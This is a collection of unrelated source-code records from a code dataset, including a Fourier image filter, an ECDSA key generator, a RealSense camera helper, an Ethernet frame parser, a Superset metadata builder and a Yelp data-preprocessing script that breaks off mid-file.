+{"seq_id":"647174236","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg \nimport scipy.fftpack as fft\nfrom scipy import ndimage\n\nimg = plt.imread(\"arbol.png\")\n#retorna matriz de numpy de 256x256\n\nfourier=(fft.ifft2(img))\n\nfrecuencia=np.fft.fftfreq(len(fourier[0].real))\n\nplt.figure(\"Fourier\")\nplt.plot(frecuencia,fourier)\nplt.savefig(\"LeonBenjamin_FT2D.pdf\")\n\n\n#filtro, quitamos la locacion exacta en las frecuencias donde se hallaba el ruido\n#los tres errores que bota el ejercicio son señales de precaucion al usuario por que no estamos teniendo en cuenta la parte imaginaria de la transformada\t\ni=0\nwhile i<256:\n\t\tif ((abs(frecuencia[i].real)>0.24 and abs(frecuencia[i].real)<0.26)or(abs(frecuencia[i].real)>0.038 and abs(frecuencia[i].real)<0.043)):\n\t\t\tfourier[i]=0\n\t\t\ti=i+1\n\t\telse:\n\t\t\ti=i+1\nplt.figure(\"Fourier Filtrada\")\nplt.plot(frecuencia,fourier)\nplt.savefig(\"LeonBenjamin_FT2D_filtrada.pdf\")\n\n\n\ninversatotal=fft.ifft2(fourier).real\n#Utilizamos parte real\nplt.figure(\"Imagen Filtrada\")\nplt.imshow(inversatotal,cmap=\"gray\",origin=\"lower\")\n#utilizamos origin porque la imagen sali al revez\nplt.savefig(\"LeonBenjamin_Imagen_filtrada.pdf\")\n\n\n\n","sub_path":"Fourier2D.py","file_name":"Fourier2D.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"7430285","text":"import hashlib\r\nfrom ecdsa import SigningKey, VerifyingKey, SECP256k1 \r\n\r\ndef print_byte_array(byte_array):\r\n\ti = 0\r\n\tfor data in byte_array:\r\n\t\tprint(\"%0.2X \" % data, end = \"\") \r\n\t\ti = i+1\r\n\t\tif (i == 16):\r\n\t\t\tprint(\" \")\r\n\t\t\ti = 0\r\n\tprint(\"\\n\\n\")\r\n\t\r\n#Generate keyPair and save both to disk\r\n\r\ndef main():\r\n\tprint(\"Generating random private key & public key pair with SECP256k1 curve\")\r\n\tsk = SigningKey.generate(curve=SECP256k1, hashfunc=hashlib.sha256)\r\n\tprint(\"==========Private======================\")\r\n\tprint_byte_array(sk.to_string())\r\n\tprint(\"==========Public======================\")\r\n\tvk = sk.verifying_key\r\n\tprint_byte_array(vk.to_string())\r\n\r\n\twith open(\"private.pem\", \"wb\") as f:\r\n\t\tf.write(sk.to_pem())\r\n\twith open(\"public.pem\", \"wb\") as f:\r\n\t\tf.write(vk.to_pem())\r\n\tprint(\"private.pem , public.pem saved\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"ci/KeyGenerator.py","file_name":"KeyGenerator.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"266126269","text":"# -*- coding: utf8 -*-fr\n# pylint: disable=too-many-instance-attributes, invalid-name\n\"\"\"\nHasVirtualHost is a mixin representing the virtualhost attached to some of the objects.\n\"\"\"\n\nfrom itopapi.model.prototype import ItopapiPrototype\n\n__version__ = '1.0'\n__authors__ = ['Julien Nauroy ']\n\n\nclass HasVirtualHost(object):\n \"\"\"\n HasVirtualHost represents the VirtualHost attached to some top-level objects.\n \"\"\"\n\n \"\"\" Configuration specific to itop \"\"\"\n foreign_key = {'id': 'virtualhost_id', 'name': 'virtualhost_name', 'table': 'VirtualHost'}\n\n def __init__(self):\n super(HasVirtualHost, self).__init__()\n\n # Object's virtualhost id. Call find_virtualhost to get the full information or just use\n # virtualhost_id_friendlyname and virtualhost_name\n self.virtualhost_id = None\n # Object's virtualhost id's friendly name. Not sure the difference with virtualhost_name\n self.virtualhost_id_friendlyname = None\n # Object's virtualhost name\n self.virtualhost_name = None\n\n def find_virtualhost(self):\n \"\"\"\n Retrieve the ItopapiVirtualHost related to this instance\n \"\"\"\n if self.virtualhost_id is not None:\n return ItopapiPrototype.get_itop_class('VirtualHost').find(self.virtualhost_id)\n return None\n\n def set_virtualhost(self, virtualhost):\n \"\"\"\n Set the ItopapiVirtualHost parameters\n \"\"\"\n self.virtualhost_id = virtualhost.instance_id\n self.virtualhost_id_friendlyname = virtualhost.friendlyname\n self.virtualhost_name = virtualhost.name\n","sub_path":"itopapi/model/features/hasVirtualHost.py","file_name":"hasVirtualHost.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"217752926","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Filename: lqr.py\n# @Date: 2019-07-15-12-59\n# @Author: Hany Abdulsamad\n# @Contact: hany@robot-learning.de\n\nimport gym\nimport matplotlib.pyplot as plt\n\nfrom rl.pgpe import PGPE\n\nenv = gym.make('LQR-RL-v0')\nenv._max_episode_steps = 100\n\npgpe = PGPE(env, n_episodes=100,\n discount=0.995,\n alpha=1e-5, beta=1e-8,\n pdict={'type': 'poly', 'degree': 1, 'cov0': 0.1})\n\ntrace = pgpe.run(nb_iter=10, verbose=True)\n\nrollouts = pgpe.sample(25)\n\nfig = plt.figure()\nfor r in rollouts:\n plt.plot(r['x'][:, 0])\nplt.show()\n","sub_path":"examples/pgpe/lqr.py","file_name":"lqr.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"557651610","text":"dongu_kontrol = False\r\nwhile not dongu_kontrol:\r\n kullanici_adi = input(\"kullanici adi giriniz:\")\r\n uzanti = input(\"(@ sonraki ifade) uzanti adresi giriniz:\")\r\n boyut = len(kullanici_adi)\r\n liste = list(kullanici_adi)\r\n boyut1 = len(uzanti)\r\n liste1 = list(uzanti)\r\n uzantikontrol = 0\r\n kontrol = 0\r\n kullanicikontrol = 0\r\n karakter = '-', '_'\r\n ana_karakter = '@'\r\n nokta = \".\"\r\n mail = kullanici_adi+uzanti\r\n if boyut >= 1 and boyut <= 12 and boyut1 >= 1 and boyut1 <= 60:\r\n for i in range(boyut):\r\n if liste[i].isupper():\r\n kontrol = 1\r\n elif liste[i].islower():\r\n kontrol = 1\r\n if kontrol == 0:\r\n kullanicikontrol = 1\r\n kontrol = 0\r\n\r\n for i in range(boyut):\r\n if liste[i] in karakter:\r\n kullanicikontrol = 0\r\n kontrol = 0\r\n kontrol = 0\r\n\r\n for i in range(boyut):\r\n if kullanici_adi.startswith(ana_karakter):\r\n kontrol = 1\r\n kullanicikontrol = 1\r\n break\r\n elif kullanici_adi.endswith(ana_karakter):\r\n kontrol = 0\r\n kullanicikontrol = 0\r\n if kontrol == 0:\r\n kullanicikontrol = 0\r\n kontrol = 0\r\n\r\n for i in range(boyut):\r\n if liste.count(ana_karakter) == 1:\r\n kontrol = 0\r\n kullanicikontrol = 0\r\n else:\r\n kullanicikontrol = 1\r\n kontrol = 1\r\n if kontrol == 0:\r\n kullanicikontrol = 0\r\n kontrol = 1\r\n\r\n for i in range(boyut1):\r\n if liste1[i] in nokta:\r\n if liste1.count(nokta) >= 1 and liste1.count(nokta) <= 2:\r\n uzantikontrol = 0\r\n kontrol = 0\r\n else:\r\n uzantikontrol = 1\r\n kontrol = 1\r\n if kontrol == 0:\r\n uzantikontrol = 0\r\n kontrol = 1\r\n\r\n for i in range(boyut1):\r\n if uzanti.startswith(nokta):\r\n kontrol = 1\r\n uzantikontrol = 1\r\n\r\n if uzanti.endswith(nokta):\r\n kontrol = 1\r\n uzantikontrol = 1\r\n if kontrol == 0:\r\n uzantikontrol = 0\r\n kontrol = 0\r\n\r\n\r\n if kullanicikontrol == 0 and uzantikontrol == 0:\r\n print('uzantı boyutu',liste1.count(nokta)+1)\r\n print(mail)\r\n print(\"BASARILI\")\r\n dongu_kontrol = True\r\n else:\r\n print('uzantı boyutu', liste1.count(nokta) + 1)\r\n print(mail)\r\n print(\"BASARISIZ\")\r\n\r\n else:\r\n print(\"GECERSIZ BOYUT.!!!\")","sub_path":"odevler_proje/python_odev/python-problemset-2.py","file_name":"python-problemset-2.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"12514232","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n \n def clone(self, node, adder):\n if node == None:\n return None\n tree = TreeNode(node.val + adder)\n tree.left = self.clone(node.left, adder)\n tree.right = self.clone(node.right, adder)\n return tree\n \n def generateTrees(self, n: int) -> List[TreeNode]:\n if n == 0:\n return []\n dp = {}\n dp[0] = [None]\n dp[1] = [TreeNode(1)]\n dp[2] = [TreeNode(1, None, TreeNode(2)), TreeNode(2, TreeNode(1), None)]\n for i in range(3, n+1):\n dp[i] = []\n for j in range(1, i+1):\n for left_node in dp[j-1]:\n for right_node in dp[i-j]:\n newTree = TreeNode(j)\n newTree.left = self.clone(left_node, 0)\n newTree.right = self.clone(right_node, j)\n dp[i].append(newTree)\n return dp[n]","sub_path":"data_structures/tree/construct_bst_for_1_to_n/leetcode.py","file_name":"leetcode.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"356800585","text":"\"\"\"\r\nthis file contains a custom class for the intelrealsense\r\n\"\"\"\r\n\r\nimport pyrealsense2 as rs\r\nimport numpy as np\r\nimport cv2 as cv\r\n\r\n\r\nclass MyRealsense:\r\n def __init__(self):\r\n # pipeline class object\r\n self.pipeline = rs.pipeline()\r\n # configuration\r\n self.class_config = rs.config()\r\n\r\n # default configurations\r\n self.width = 640\r\n self.height = 480\r\n self.frame_rate = 30\r\n\r\n\r\n def MyRealsense_configure(self):\r\n try:\r\n # update configurations\r\n self.class_config.enable_stream(rs.stream.depth, self.width, self.height, rs.format.z16, self.frame_rate)\r\n self.class_config.enable_stream(rs.stream.color, self.width, self.height, rs.format.bgr8, self.frame_rate)\r\n return True\r\n except:\r\n return False\r\n\r\n def MyRealsense_start_pipe(self):\r\n try:\r\n self.pipeline.start(self.class_config)\r\n return True\r\n except:\r\n return False\r\n\r\n def MyRealsense_wait_for_lense(self, num_frames):\r\n try:\r\n for x in range(num_frames):\r\n self.pipeline.wait_for_frames()\r\n return True\r\n except:\r\n return False\r\n\r\n def MyRealsense_stop_pipe(self):\r\n try:\r\n self.pipeline.stop()\r\n return True\r\n except:\r\n return False\r\n\r\n def MyRealsense_get_color_frame(self):\r\n try:\r\n frameset = self.pipeline.wait_for_frames()\r\n color_frame = frameset.get_color_frame()\r\n # convert to np array\r\n color_image = np.asanyarray(color_frame.get_data())\r\n return color_image\r\n except:\r\n print(' -> COULD NOT GET COLOR FRAME')\r\n\r\n def MyRealsense_get_depth_frame(self):\r\n try:\r\n frameset = self.pipeline.wait_for_frames()\r\n depth_frame = frameset.get_depth_frame()\r\n # convert to np array\r\n depth_image = np.asanyarray(depth_frame.get_data())\r\n return depth_image\r\n except:\r\n print(' -> COULD NOT GET DEPTH FRAME')\r\n\r\n def MyRealsense_filter_depth(self, src, val, thresh):\r\n try:\r\n # grab boundries\r\n val_low = val[0] - thresh[0]\r\n if val_low <= 0:\r\n val_low = 0\r\n val_high = val[0] + thresh[0]\r\n\r\n return cv.inRange(src, val_low, val_high)\r\n except:\r\n print(' -> COULD NOT FILTER DEPTH')\r\n\r\n def MyRealsense_filter_hsv(self, src, val, thresh):\r\n try:\r\n val_low = [val[0]-thresh[0], val[1]-thresh[1], val[2]-thresh[2]]\r\n if val_low[0] < 0:\r\n val_low[0] = 0\r\n if val_low[1] < 0:\r\n val_low[1] = 0\r\n if val_low[2] < 0:\r\n val_low[2] = 0\r\n val_high = [val[0] + thresh[0], val[1] + thresh[1], val[2] + thresh[2]]\r\n if val_high[0] > 179:\r\n val_high[0] = 179\r\n if val_high[1] > 255:\r\n val_high[1] = 255\r\n if val_high[2] > 255:\r\n val_high[2] = 255\r\n # create bounds\r\n bound_low = np.array(val_low)\r\n bound_high = np.array(val_high)\r\n\r\n return cv.inRange(src, bound_low, bound_high)\r\n except:\r\n print(' -> COULD NOT FILTER HSV')\r\n\r\n\r\n def MyRealsense_erode_frame(self, src, iterations):\r\n return cv.erode(src, None, iterations=iterations)\r\n\r\n\r\n def MyRealsense_dilate_frame(selfself, src, iterations):\r\n return cv.dilate(src, None, iterations=iterations)\r\n\r\n","sub_path":"helper_rs.py","file_name":"helper_rs.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"429845846","text":"import logging\nimport struct\n\nfrom nally.config import config\nfrom nally.core.layers.inet.ip.ip_packet import IpPacket\nfrom nally.core.layers.link.arp.arp_packet import ArpPacket\nfrom nally.core.layers.link.proto_type import EtherType\nfrom nally.core.layers.link.ethernet.ethernet_utils import EthernetUtils\nfrom nally.core.layers.packet import Packet\n\n\nclass EthernetPacket(Packet):\n \"\"\"\n Represents Ethernet II (DIX Ethernet) frame\n \"\"\"\n\n ETHERNET_HEADER_LENGTH_BYTES = 14\n\n ETHERNET_PACKET_FORMAT = \"!6s6sH\"\n \"\"\"\n Ethernet packet format, includes 12 bytes for source and\n destination MAC addresses and also 2 bytes for EtherType/length field\n \"\"\"\n\n INTERNET_LAYER_CONVERTERS = {\n EtherType.IPV4: IpPacket.from_bytes,\n EtherType.ARP: ArpPacket.from_bytes\n }\n \"\"\"\n Defines converters to the Internet layer packets based on the value of\n EtherType field in Ethernet frame\n \"\"\"\n\n LOG = logging.getLogger(\"EthernetPacket\")\n\n def __init__(\n self,\n dest_mac: str,\n source_mac: str = config.interface_mac,\n ether_type: EtherType = EtherType.IPV4,\n ):\n \"\"\"\n Initializes Ethernet frame instance\n\n :param dest_mac: destination MAC address, could be either a byte array\n or hexadecimal string\n :param source_mac: source MAC address, could be either a byte array or\n hexadecimal string, if not specified, then local MAC will be\n picked up\n :param ether_type: can either be a 2 bytes number which specifies\n payload size in bytes or EtherType instance which indicates which\n protocol is encapsulated in the payload of the frame\n \"\"\"\n super().__init__()\n self.__dest_mac = EthernetUtils.validate_mac(dest_mac)\n self.__source_mac = EthernetUtils.validate_mac(source_mac)\n self.__ether_type = EthernetUtils.validate_ether_type(ether_type)\n\n def to_bytes(self):\n header = struct.pack(\n self.ETHERNET_PACKET_FORMAT,\n self.__dest_mac,\n self.__source_mac,\n self.__ether_type,\n )\n return header + EthernetUtils.validate_payload(self.raw_payload)\n\n @staticmethod\n def from_bytes(bytes_packet: bytes):\n header_bytes = bytes_packet[:EthernetPacket.ETHERNET_HEADER_LENGTH_BYTES] # noqa E501\n payload_bytes = EthernetUtils.validate_payload(\n bytes_packet[EthernetPacket.ETHERNET_HEADER_LENGTH_BYTES:]\n )\n packet_fields = struct.unpack(\n EthernetPacket.ETHERNET_PACKET_FORMAT,\n header_bytes\n )\n dest_mac = packet_fields[0]\n source_mac = packet_fields[1]\n ether_type = packet_fields[2]\n ethernet_packet = EthernetPacket(dest_mac, source_mac, ether_type)\n if len(payload_bytes) == 0:\n return ethernet_packet\n # try to find appropriate converter based on EtherType field\n internet_layer_converter = EthernetPacket \\\n .INTERNET_LAYER_CONVERTERS \\\n .get(ether_type)\n if internet_layer_converter is None:\n EthernetPacket.LOG.warning(\n f\"Can't find converter to internet layer packet. \"\n f\"EtherType: {ether_type}. 
\"\n f\"Payload: {payload_bytes.hex()}\"\n )\n return ethernet_packet\n internet_layer = internet_layer_converter(payload_bytes)\n return ethernet_packet / internet_layer\n\n def is_response(self, packet: Packet) -> bool:\n if EthernetPacket not in packet:\n return False\n ethernet_layer: EthernetPacket = packet[EthernetPacket]\n # check EtherType field\n if self.ether_type != ethernet_layer.ether_type:\n return False\n # here we know that 'self' is a valid response on Ethernet layer,\n # now delegate further processing to the upper layer if one exists\n return (\n self.upper_layer.is_response(packet)\n if self.upper_layer is not None\n else True\n )\n\n @property\n def dest_mac(self):\n return self.__dest_mac\n\n @property\n def source_mac(self):\n return self.__source_mac\n\n @property\n def ether_type(self):\n return self.__ether_type\n\n def __eq__(self, other: object) -> bool:\n if isinstance(other, EthernetPacket):\n return self.source_mac == other.source_mac and \\\n self.dest_mac == other.dest_mac and \\\n self.ether_type == other.ether_type and \\\n self.upper_layer == other.upper_layer\n return False\n\n def __str__(self) -> str:\n dest_mac = self.dest_mac.hex()\n src_mac = self.source_mac.hex()\n ether_type = hex(self.ether_type)\n ether_type_name = (\n self.ether_type.name\n if isinstance(self.ether_type, EtherType)\n else \"length\"\n )\n return f\"Ethernet(dest_mac={dest_mac}, \" \\\n f\"src_mac={src_mac}, \" \\\n f\"ether_type={ether_type} ({ether_type_name})) \"\n","sub_path":"nally/core/layers/link/ethernet/ethernet_packet.py","file_name":"ethernet_packet.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"199242027","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n# pylint: disable=C,R,W\n\nimport json\n\nimport requests\n\nfrom superset.yoyi.utils import utils\n\nclass metadata:\n\n @classmethod\n def get_metadata_from_bi(self, bi_url, data):\n \"\"\"\n 从BI获取元数据\n :param data:\n :return:\n \"\"\"\n url = \"{}/bi/getMetadataByType?type=1&logicType=bi\".format(bi_url)\n request = requests.get(url=url)\n obj = json.loads(request.content, encoding=\"utf-8\")\n return self.build_metadata(obj, form_data=data)\n\n @staticmethod\n def build_metadata(metadata, form_data):\n all = []\n dims = []\n metrics_combo = []\n columns = []\n metrics = []\n verbose = {}\n order_by_choices = []\n for item in metadata:\n fieldName = item[\"fieldName\"]\n displayName = item[\"displayName\"]\n logicCategory = item[\"logicCategory\"]\n dataType = item[\"dataType\"]\n\n temp = [fieldName, displayName]\n verbose[fieldName] = displayName\n all.append(temp)\n order_by_choices.append((json.dumps([fieldName, True]), \"{} 正序\".format(displayName)))\n order_by_choices.append((json.dumps([fieldName, False]), \"{} 倒序\".format(displayName)))\n\n if logicCategory == \"dimension\":\n dims.append(temp)\n desc = {\n \"type\": dataType,\n \"dimension\": fieldName,\n \"outputName\": fieldName,\n \"outputType\": dataType\n }\n columns.append({\n \"column_name\": fieldName,\n \"verbose_name\": displayName,\n \"description\": displayName,\n \"expression\": json.dumps(desc),\n \"filterable\": True,\n \"groupby\": True,\n \"is_dttm\": None if fieldName != \"bizdate\" else True,\n \"type\": None\n })\n elif logicCategory == \"metric\":\n metrics_combo.append(temp)\n desc = {\n \"type\": \"longSum\",\n \"name\": fieldName,\n \"fieldName\": fieldName\n }\n metrics.append({\n \"metric_name\": fieldName,\n \"verbose_name\": displayName,\n \"description\": displayName,\n \"expression\": json.dumps(desc),\n \"warning_text\": \"\",\n \"d3format\": \"\"\n })\n form_data[\"all_cols\"] = all\n form_data[\"filterable_cols\"] = dims\n form_data[\"gb_cols\"] = dims\n form_data[\"metrics_combo\"] = metrics_combo\n form_data[\"name\"] = utils.get_table_name()\n form_data[\"datasource_name\"] = utils.get_table_name()\n form_data[\"columns\"] = columns\n form_data[\"metrics\"] = metrics\n form_data[\"verbose_map\"] = verbose\n form_data[\"order_by_choices\"] = order_by_choices\n return form_data\n","sub_path":"superset/yoyi/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"296498058","text":"import re\nimport json\nimport glob\nimport math\nimport html\nimport itertools\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nimport lxml.html\nimport lxml.html.clean\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_score\n\nYELP_BIN_COLS = ['BikeParking', 'BusinessAcceptsCreditCards', 'ByAppointmentOnly', 'Caters', 'GoodForKids', 'HasTV', 'OutdoorSeating',\n 'RestaurantsDelivery', 'RestaurantsGoodForGroups', 'RestaurantsReservations', 'RestaurantsTakeOut', 'WheelchairAccessible',\n 'Ambience_casual', 'Ambience_classy', 'Ambience_divey', 'Ambience_hipster', 'Ambience_intimate', \n 'Ambience_romantic', 'Ambience_touristy', 'Ambience_trendy', 'Ambience_upscale', \n 'BusinessParking_garage', 'BusinessParking_lot', 'BusinessParking_street', 'BusinessParking_valet', 'BusinessParking_validated', \n 'GoodForMeal_breakfast', 'GoodForMeal_brunch', 'GoodForMeal_dessert', 'GoodForMeal_dinner', 'GoodForMeal_latenight', 'GoodForMeal_lunch']\nYELP_STR_COLS = ['business_id', 'name', 'categories', 'NoiseLevel', 'Alcohol', 'RestaurantsAttire', 'WiFi', 'RestaurantsPriceRange2']\n\nYELP_FIELDS = ['group_id', 'name', 'category', 'noise level', 'alcohol', 'restaurants attire', 'wifi', 'restaurants price range', 'bike parking', \n 'accept credit cards', 'by appointment only', 'cater', 'good for kids', 'has tv', 'outdoor seating', 'restaurants delivery', \n 'restaurants good for group', 'restaurants reservations', 'restaurants take out', 'wheelchair accessible', 'ambience casual', \n 'ambience classy', 'ambience divey', 'ambience hipster', 'ambience intimate', 'ambience romantic', 'ambience touristy', 'ambience trendy',\n 'ambience upscale', 'parking garage', 'parking lot', 'parking street', 'parking valet', 'parking validated', 'good for meal breakfast',\n 'good for meal brunch', 'good for meal dessert', 'good for meal dinner', 'good for meal latenight', 'good for meal lunch', \n 'ratings', 'hours monday', 'hours tuesday', 'hours wednesday', 'hours thursday', 'hours friday', 'hours saturday', 'hours sunday']\n\nAMAZON_CATEGORIES = ['Clothing_Shoes_and_Jewelry', 'Electronics', 'Health_and_Personal_Care', 'Home_and_Kitchen']\n\ndef _basic_str_preprocessing(x):\n if type(x) == str:\n if x.startswith(\"u'\") and x.endswith(\"'\"):\n x = x[1:]\n if x.startswith(\"'\") and x.endswith(\"'\"):\n x = x[1:-1]\n if x == 'None':\n x = None\n return x\n\ndef _to_binary(x, max_len, rounding=True):\n if rounding:\n x = round(x * 2.0) / 2.0\n p_float, p_integer = math.modf(x)\n b_integer = bin(int(p_integer))[2:]\n b_float = bin(math.ceil(p_float))[2:]\n binary = b_integer + b_float\n return '0' * (max_len-len(binary)) + binary\n\ndef _to_coordinate(hours):\n s, e = hours.split('-')\n s_h, s_m = [int(x) for x in s.split(':')]\n e_h, e_m = [int(x) for x in e.split(':')]\n\n s = float(s_h + s_m / 60.)\n e = float(e_h + e_m / 60.)\n\n if s >= e:\n e = e + 24.\n return [s, e]\n\ndef _clean_html(html):\n html = re.sub('\\[if gte mso 9\\][\\s\\S]+\\[endif\\]', ' ', html)\n html = re.sub('&[amp;]+lt;[\\s\\S]+&[amp;]+gt;', ' ', html)\n html = re.sub('.caption \\{[\\s\\S]+\\}', ' ', html)\n html = re.sub('#jl_box\\{[\\s\\S]+\\}', ' ', html)\n html = re.sub('#review[\\s\\S]+\\}', ' ', html)\n html = re.sub('.productDescriptionWrapper table\\{[\\s\\S]+\\}', ' ', html)\n html = re.sub('#productDescription \\{[\\s\\S]+\\}', ' ', html)\n html = re.sub('DOCTYPE html PUBLIC[\\s\\S]+\\}', ' ', html)\n html = re.sub('A\\+[\\s\\S]+\\}', ' ', html)\n html = 
re.sub('[\\S]+[\\s]?\\{[\\s\\S]+\\}', ' ', html)\n html = re.sub('\\\\xa0', ' ', html)\n html = re.sub('\\s+', ' ', html)\n if html in ['', ' ']:\n return ''\n else:\n doc = lxml.html.fromstring(html)\n cleaner = lxml.html.clean.Cleaner(style=True)\n doc = cleaner.clean_html(doc)\n text = doc.text_content()\n text = text.replace('\\xa0', ' ')\n text = re.sub('<.*?>', ' ', text)\n text = re.sub('\\s+', ' ', text)\n if text == ' ':\n return ''\n else:\n return text\n\ndef _make_field(x, raw_field, new_field, null_value, processing_function):\n if raw_field not in x:\n x[new_field] = null_value\n else:\n x[new_field] = processing_function(x.pop(raw_field))\n return x\n\ndef _yelp_table_preprocessing():\n # Load meta\n json_list = []\n f = open('data/yelp/raw_others/business.json', 'r', encoding='utf-8')\n for line in f.readlines():\n json_ = json.loads(line)\n json_list.append(json_)\n\n # Process meta\n all_attributes = sorted(set(itertools.chain(*[list(x['attributes'].keys()) \n if x['attributes'] != None else [] for x in json_list])))\n all_hours = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n\n processed_list = []\n for raw in json_list:\n processed = {\n 'business_id' : raw['business_id'],\n 'name' : raw['name'],\n 'stars' : raw['stars'],\n 'categories' : raw['categories']\n }\n for attributes in all_attributes:\n processed[attributes] = None\n if raw['attributes']:\n if attributes in raw['attributes']:\n processed[attributes] = raw['attributes'][attributes]\n for hours in all_hours:\n processed['hours_%s' % hours] = None\n if raw['hours']:\n if hours in raw['hours']:\n processed['hours_%s' % hours] = raw['hours'][hours]\n processed_list.append(processed)\n\n df = pd.DataFrame(processed_list)\n\n # Basic str preprocessing\n for col in df.columns:\n temp = df[col]\n df[col] = temp.apply(_basic_str_preprocessing)\n\n # Feature selection based on null ratio\n col_stats = df.notnull().sum(axis=0) / len(df)\n net_cols = col_stats[col_stats >= 0.1].keys()\n df = df[net_cols]\n\n # Hierarchical feature processing\n hier_keys = dict()\n for col in df.columns[2:]:\n temp = df[col]\n dict_temp = temp[temp.apply(lambda x : type(x) == str and '{' in x)]\n if len(dict_temp) != 0:\n hier_keys[col] = sorted(set(list(itertools.chain(*dict_temp.apply(lambda x : list(eval(x).keys()))))))\n\n for key in hier_keys.keys():\n def _dict_to_list(x, values):\n result = []\n x = eval(x)\n for val in values:\n if val in x:\n result.append(x[val])\n else:\n result.append(None)\n return result\n\n temp = df[key]\n values = hier_keys[key]\n\n temp = temp.apply(lambda x : [None] * len(values) if x == None else _dict_to_list(x, values))\n df_temp = pd.DataFrame(list(temp), columns=['%s_%s' % (key, val) for val in values])\n\n df.pop(key)\n df = pd.concat([df, df_temp], axis=1)\n\n # Fill null\n df.fillna('', inplace=True)\n\n # Erase _ in string\n df['NoiseLevel'] = df['NoiseLevel'].apply(lambda x : x.replace('_', ' ') if '_' in x else x)\n df['Alcohol'] = df['Alcohol'].apply(lambda x : x.replace('_', ' ') if '_' in x else x)\n\n # Categories processing\n categories_len = df.categories.apply(lambda x : len(x.split(', ')))\n categories_len_threshold = np.percentile(categories_len, 90)\n df['categories'] = df.categories.apply(lambda x : ', '.join(x.split(', ')[:int(categories_len_threshold-1)]))\n\n # Hours processing\n hours_columns = [x for x in df.columns if 'hours' in x]\n all_hours = pd.Series(list(itertools.chain(*[list(df[x][df[x] != '']) for x in hours_columns])))\n 
all_hours_val = all_hours.value_counts()\n\n for i in range(len(all_hours_val)):\n set_hours_val = all_hours_val[all_hours_val >= i]\n ratio = sum(set_hours_val) / len(all_hours)\n if ratio < 0.9:\n break\n\n set_hours_val = all_hours_val[all_hours_val >= i]\n set_hours = pd.Series(list(set_hours_val.index))\n X = np.array(list(set_hours.apply(_to_coordinate)))\n\n cluster_list = [3, 4, 5, 7, 10]\n score_list = []\n for cluster in cluster_list:\n kmeans = KMeans(n_clusters=cluster, random_state=0).fit(X)\n y = kmeans.fit_predict(X)\n score = silhouette_score(X, y)\n score_list.append(score)\n\n best_cluster = cluster_list[np.argmax(score_list)]\n kmeans = KMeans(n_clusters=best_cluster, random_state=0).fit(X)\n\n # Binary type processing (to str type)\n for col in YELP_BIN_COLS:\n temp = df[col]\n temp = temp.apply(lambda x : 'true' if x in [1.0, 1, True, 'True'] else x)\n temp = temp.apply(lambda x : 'false' if x in [0.0, 0, False, 'False'] else x)\n df[col] = temp\n\n # Ordinary type processing (to str type)\n price_dict = {\n '1' : 'cheap',\n '2' : 'average',\n '3' : 'expensive',\n '4' : 'very expensive',\n }\n df['RestaurantsPriceRange2'] = df.RestaurantsPriceRange2.apply(lambda x : price_dict[x] if x != '' else x)\n\n # String type features\n df_str = df[YELP_STR_COLS + YELP_BIN_COLS]\n\n # Numeric type processing\n df_num = pd.DataFrame(df['stars'].apply(lambda x : _to_binary(x, 4, False)))\n\n # Categorical type processing\n df_categorical = []\n for col in hours_columns:\n temp = df[col].apply(lambda x : _to_coordinate(x) if x != '' else x)\n temp_notnull = temp[temp != '']\n temp[temp != ''] = pd.Series([str(x) for x in list(kmeans.predict(np.array(list(temp_notnull))))], index=temp_notnull.index)\n df_categorical.append(temp)\n df_categorical = pd.concat(df_categorical, axis=1)\n\n # Get meta\n meta = pd.concat([df_str, df_num, df_categorical], axis=1)\n meta.columns = YELP_FIELDS\n\n # Select essential meta\n train_file_list = glob.glob('data/yelp/5.text/train/*')\n val_file_list = glob.glob('data/yelp/5.text/val/*')\n test_file = pd.read_csv('data/yelp/test/summaries_0-200_cleaned.csv', encoding='utf-8')\n\n train_group_id_list = [x.split('/')[-1][:-4] for x in train_file_list] \n val_group_id_list = [x.split('/')[-1][:-4] for x in val_file_list]\n test_group_id_list = [x for x in test_file['Input.business_id'] if type(x) == str]\n\n meta.index = meta.group_id\n set_meta = meta.loc[sorted(set(train_group_id_list + val_group_id_list + test_group_id_list))]\n\n # Save meta\n 